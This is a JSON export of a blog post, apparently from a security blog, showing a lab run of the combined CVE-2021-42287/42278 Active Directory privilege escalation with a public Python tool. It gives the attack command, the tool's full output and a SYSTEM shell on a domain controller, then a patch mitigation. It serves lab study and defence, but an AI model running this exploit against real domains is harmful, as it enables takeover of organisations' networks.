{"id":1228,"date":"2022-01-02T16:29:51","date_gmt":"2022-01-02T08:29:51","guid":{"rendered":"\/?p=1228"},"modified":"2022-01-02T16:29:51","modified_gmt":"2022-01-02T08:29:51","slug":"active-directory-takeover-via-cve-2021-42287-cve-2021-42278","status":"publish","type":"post","link":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/","title":{"rendered":"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278"},"content":{"rendered":"

A new year and a yet another way to take over Microsoft Active Directory.
\nBack in November last year, Microsoft patched two Active Directory privilege escalation vulnerabilities. When these two vulnerabilites are combined it allows for a domain user level takeover of an Active Directory setup.
\nThese two privilege escalation vulnerabilities are tracked as CVE2021-42287<\/a> and CVE-2021-42278<\/a>. Github user WazeHell created a PoC<\/a> for the combined takeover attack using python3 and impacket. This tool was released on 11\/12\/21 on both Github and Twitter. Lets go ahead and lab it!<\/p>\n

Disclaimer<\/strong>
\nAs always, seek permission before using such tools on a production network, or use a VMware lab that way no one gets hurt!<\/p>\n

Prerequisites<\/strong>
\n1. A Kali Linux VM (python3 and impacket should already be installed)
\n2. Download the repository from WazeHell github \u2013 sam_the_admin.py
\n3. In this example our VM host ip is 10.1.1.1 and our DC is 10.1.1.10
\n4. Setup a standard Windows AD domain and a domain user account \/ password. Make sure November 2021 security patches are not installed.<\/p>\n

Steps<\/strong>
\n1. Launch a Kali linux terminal and run the command:
\npython3 sam_the_admin.py \"testdomain\/dummy:TestdomainPW!\" -dc-ip 10.1.1.10 -shell<\/code>
\n2. If all goes well you\u2019ll see the privilege escalation output of the python script, wherein it creates a machine account and impersonates the administrator.
\npython3 sam_the_admin.py \"testdomain\/dummy:TestdomainPW!\" -dc-ip 10.1.1.10 -shell
\nImpacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
\n[*] Selected Target dc1.testdomain.network
\n[*] Total Domain Admins 1
\n[*] will try to impersonate Administrator
\n[*] Current ms-DS-MachineAccountQuota = 10
\n[*] Adding Computer Account \"SAMTHEADMIN-93$\"
\n[*] MachineAccount \"SAMTHEADMIN-93$\" password = 4Ug3TAHquT^U
\n[*] Successfully added machine account SAMTHEADMIN-93$ with password redacted.
\n[*] SAMTHEADMIN-93$ object = CN=SAMTHEADMIN-93,CN=Computers,DC=testdomain,DC=network
\n[*] SAMTHEADMIN-93$ sAMAccountName == dc
\n[*] Saving ticket in dc1.ccache
\n[*] Resting the machine account to SAMTHEADMIN-93$
\n[*] Restored SAMTHEADMIN-93$ sAMAccountName to original value
\n[*] Using TGT from cache
\n[*] Impersonating Administrator
\n[*] Requesting S4U2self
\n[*] Saving ticket in Administrator.ccache
\nImpacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
\n[!] Launching semi-interactive shell - Careful what you execute
\nC:\\Windows\\system32><\/code><\/p>\n

3. It will drop to a shell on the DC where you are system:
\nC:\\Windows\\system32>whoami
\nnt authority\\system<\/code><\/p>\n

\"samtheadmin.py\"<\/a><\/p>\n

Mitigation<\/strong>
\nInstall the November 2021 Microsoft Security patches for Windows Server platforms in your environment.
\nAs you can see above, the exploit is trival to perform with minimal effort required.
\nYou can use a threat query with 365 defender that Microsoft detail here<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"

A new year and a yet another way to take over Microsoft Active Directory. Back in November last year, Microsoft patched two Active Directory privilege…<\/p>\n","protected":false},"author":2,"featured_media":1229,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21,22],"tags":[49,56,82,83,148],"class_list":["post-1228","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-active-directory","category-attack","tag-active-directory","tag-attack","tag-cve-2021-42278","tag-cve-2021-42287","tag-privilege-escalation"],"acf":[],"yoast_head":"\nActive Directory Takeover via CVE-2021-42287 & CVE-2021-42278 - Insecure Wire<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278 - Insecure Wire\" \/>\n<meta property=\"og:description\" content=\"A new year and a yet another way to take over Microsoft Active Directory. Back in November last year, Microsoft patched two Active Directory privilege...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/\" \/>\n<meta property=\"og:site_name\" content=\"Insecure Wire\" \/>\n<meta property=\"article:published_time\" content=\"2022-01-02T08:29:51+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png\" \/>\n\t<meta property=\"og:image:width\" content=\"714\" \/>\n\t<meta property=\"og:image:height\" content=\"416\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"nikonau\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/insecurewire\" \/>\n<meta name=\"twitter:site\" content=\"@insecurewire\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nikonau\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/\"},\"author\":{\"name\":\"nikonau\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\"},\"headline\":\"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278\",\"datePublished\":\"2022-01-02T08:29:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/\"},\"wordCount\":265,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png\",\"keywords\":[\"Active Directory\",\"Attack\",\"CVE-2021-42278\",\"CVE-2021-42287\",\"Privilege Escalation\"],\"articleSection\":[\"Active Directory\",\"Attack\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/\",\"url\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/\",\"name\":\"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278 - Insecure Wire\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png\",\"datePublished\":\"2022-01-02T08:29:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#primaryimage\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png\",\"width\":714,\"height\":416,\"caption\":\"samtheadmin.py\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.insecurewi.re\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.insecurewi.re\/#website\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"name\":\"Insecure Wire\",\"description\":\"A Network Engineer\u2019s Perspective.\",\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.insecurewi.re\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.insecurewi.re\/#organization\",\"name\":\"Insecure Wire\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"width\":32,\"height\":32,\"caption\":\"Insecure Wire\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/insecurewire\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\",\"name\":\"nikonau\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"caption\":\"nikonau\"},\"sameAs\":[\"https:\/\/x.com\/https:\/\/twitter.com\/insecurewire\"],\"url\":\"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278 - Insecure Wire","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/","og_locale":"en_US","og_type":"article","og_title":"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278 - Insecure Wire","og_description":"A new year and a yet another way to take over Microsoft Active Directory. Back in November last year, Microsoft patched two Active Directory privilege...","og_url":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/","og_site_name":"Insecure Wire","article_published_time":"2022-01-02T08:29:51+00:00","og_image":[{"width":714,"height":416,"url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png","type":"image\/png"}],"author":"nikonau","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/insecurewire","twitter_site":"@insecurewire","twitter_misc":{"Written by":"nikonau","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#article","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/"},"author":{"name":"nikonau","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d"},"headline":"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278","datePublished":"2022-01-02T08:29:51+00:00","mainEntityOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/"},"wordCount":265,"commentCount":0,"publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png","keywords":["Active Directory","Attack","CVE-2021-42278","CVE-2021-42287","Privilege Escalation"],"articleSection":["Active Directory","Attack"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/","url":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/","name":"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278 - Insecure Wire","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#primaryimage"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png","datePublished":"2022-01-02T08:29:51+00:00","breadcrumb":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#primaryimage","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/01\/samtheadmin.png","width":714,"height":416,"caption":"samtheadmin.py"},{"@type":"BreadcrumbList","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/01\/02\/active-directory-takeover-via-cve-2021-42287-cve-2021-42278\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.insecurewi.re\/"},{"@type":"ListItem","position":2,"name":"Active Directory Takeover via CVE-2021-42287 & CVE-2021-42278"}]},{"@type":"WebSite","@id":"https:\/\/www.insecurewi.re\/#website","url":"https:\/\/www.insecurewi.re\/","name":"Insecure Wire","description":"A Network Engineer\u2019s Perspective.","publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.insecurewi.re\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.insecurewi.re\/#organization","name":"Insecure Wire","url":"https:\/\/www.insecurewi.re\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","width":32,"height":32,"caption":"Insecure Wire"},"image":{"@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/insecurewire"]},{"@type":"Person","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d","name":"nikonau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","caption":"nikonau"},"sameAs":["https:\/\/x.com\/https:\/\/twitter.com\/insecurewire"],"url":"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/"}]}},"_links":{"self":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1228","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/comments?post=1228"}],"version-history":[{"count":0,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1228\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media\/1229"}],"wp:attachment":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media?parent=1228"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/categories?post=1228"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/tags?post=1228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}